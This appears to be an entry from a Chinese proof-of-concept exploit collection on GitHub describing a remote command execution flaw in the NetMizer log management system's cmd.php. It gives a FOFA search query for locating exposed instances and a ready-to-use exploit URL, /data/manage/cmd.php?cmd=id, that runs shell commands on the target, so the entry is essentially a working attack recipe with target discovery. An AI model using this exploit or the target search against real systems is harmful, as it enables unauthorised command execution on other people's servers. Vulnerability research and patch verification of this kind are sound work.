Awesome-POC/网络设备漏洞/NetMizer 日志管理系统 cmd.php 远程命令执行漏洞.md

31 lines
606 B
Markdown
Raw Normal View History

2022-05-19 18:49:40 +08:00
# NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
## 漏洞描述
NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞攻击者通过传入 cmd参数即可命令执行
## 漏洞影响
```
NetMizer 日志管理系统
```
## FOFA
```
title="NetMizer 日志管理系统"
```
## 漏洞复现
登录页面
![image-20220519175506872](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191755197.png)
验证POC
```
/data/manage/cmd.php?cmd=id
```
![image-20220519175604237](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191756275.png)